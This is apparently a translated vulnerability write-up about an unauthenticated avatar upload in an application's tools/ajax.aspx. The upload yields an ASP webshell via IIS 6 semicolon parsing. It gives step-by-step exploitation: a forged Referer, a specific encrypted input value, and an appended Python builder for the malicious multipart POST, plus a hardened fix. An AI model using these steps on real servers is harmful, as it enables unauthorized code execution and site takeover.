Affected versions: apparently all versions.
Vulnerable file: tools/ajax.aspx
Vulnerability analysis: the AJAX requests handled by this page perform no permission check, so an anonymous visitor can invoke any of the methods in the page with the application's own privileges, which is very dangerous. The following vulnerability results from this.
When the filename and upload parameters are both non-empty, the page reads the input parameter, decrypts it to obtain the uid, and then calls UploadTempAvatar(uid) to store the avatar. Following UploadTempAvatar further:
The uploaded file is then executed directly by IIS 6 (a file name of the form test.asp;.jpg is handled as an .asp page because of IIS 6's semicolon path parsing), which yields a webshell.
Example:
1. Target site: http://www.xxxxer.net
2. Forge the Referer, because the ajax page only checks the Referer.
3. Construct the value of the input parameter. The goal is to make the uid equal to "test.asp;". The uid is obtained by decrypting input with the key stored in /config/general.config, so encrypting "test.asp;" gives the input value "20176iiayany7w0695pyvdoa=".
4. Construct the request parameters:
After the upload succeeds, the shell address is displayed directly,
and the webshell is obtained:
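The following is an added example written for this page, not code from the original write-up or from the affected application. It shows the two halves of the issue in steps 1-4 above: why a uid of "test.asp;" becomes an executable file under IIS 6, and what the forged-Referer multipart POST to tools/ajax.aspx looks like. The form-field layout (filename, upload, input), the ".jpg" extension appended by the upload handler, and the payload body are assumptions; the encrypted input value is the one quoted above. The request is only built, never sent. The hardened naming function at the end is the fix a reviewer would ask for and is not part of the application.

```python
import re
import uuid
from urllib.request import Request

# Constructed values for this example.
TARGET = "http://www.xxxxer.net"
ENCRYPTED_UID = "20176iiayany7w0695pyvdoa="   # decrypts to the uid "test.asp;" (from the write-up)
AVATAR_EXT = ".jpg"                            # assumed extension appended by UploadTempAvatar

# Extensions IIS 6 hands to asp.dll (well-known script mappings).
IIS6_SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}


def iis6_effective_extension(stored_name: str) -> str:
    """Extension IIS 6 uses to choose a handler.

    IIS 6 resolves the handler from the path up to the first ';' and treats the
    remainder as path info, so "test.asp;.jpg" is served by asp.dll even though
    the file name ends in .jpg.
    """
    head = stored_name.split(";", 1)[0]
    m = re.search(r"(\.[^./\\]+)$", head)
    return m.group(1).lower() if m else ""


def stored_avatar_name(uid: str, ext: str = AVATAR_EXT) -> str:
    """Name the upload handler writes: the decrypted uid plus the image extension.
    The page only says the uid is used for the stored file; the layout is assumed."""
    return uid + ext


def is_executed_as_script(stored_name: str) -> bool:
    """True when IIS 6 would run the stored file instead of serving it as an image."""
    return iis6_effective_extension(stored_name) in IIS6_SCRIPT_EXTS


def safe_avatar_name(uid: str, ext: str = AVATAR_EXT) -> str:
    """Hardened replacement: ignore the user-influenced uid when naming the file,
    generate the name server-side, and whitelist the extension."""
    if ext.lower() not in {".jpg", ".jpeg", ".png", ".gif"}:
        raise ValueError("unsupported avatar extension")
    return uuid.uuid4().hex + ext.lower()


def build_upload_request(target: str, encrypted_uid: str, payload: bytes,
                         ext: str = AVATAR_EXT) -> Request:
    """Build (but do not send) the POST from steps 2-4: Referer forged to the
    target's own origin and filename/upload/input all non-empty."""
    boundary = "----exampleboundary"

    def part(name, value, filename=None, ctype=None):
        hdr = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            hdr += f'; filename="{filename}"'
        if ctype:
            hdr += f"\r\nContent-Type: {ctype}"
        return f"--{boundary}\r\n{hdr}\r\n\r\n".encode() + value + b"\r\n"

    body = (part("filename", f"avatar{ext}".encode())
            + part("input", encrypted_uid.encode())
            + part("upload", payload, filename=f"avatar{ext}", ctype="image/jpeg")
            + f"--{boundary}--\r\n".encode())
    headers = {
        "Referer": target + "/",   # ajax.aspx only checks the Referer, which the client controls
        "Content-Type": f"multipart/form-data; boundary={boundary}",
    }
    return Request(target + "/tools/ajax.aspx", data=body, headers=headers, method="POST")


if __name__ == "__main__":
    name = stored_avatar_name("test.asp;")
    print(name, "->", iis6_effective_extension(name), "executed:", is_executed_as_script(name))
    req = build_upload_request(TARGET, ENCRYPTED_UID, b'<% Response.Write("hello") %>')
    print(req.get_method(), req.full_url, req.get_header("Referer"))
```

The Referer check is the only gate on this endpoint, and a Referer is whatever the client chooses to send, so it is not an authorization control; the real fixes are a session/permission check on tools/ajax.aspx and a server-generated file name, as in safe_avatar_name.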
In actual testing, however, some targets failed, and I was too lazy to track down the reason. If you are interested, keep digging ^.^. The following note was added on the original site:
Supplementary description of Jannock:
In fact, this is not universal. The PasswordKey is regenerated during a normal installation. I suspect you installed from the source code. However, there are other ways of making use of the system-generated one.
Author: rebeyond, from the I.S.T.O Information Security Team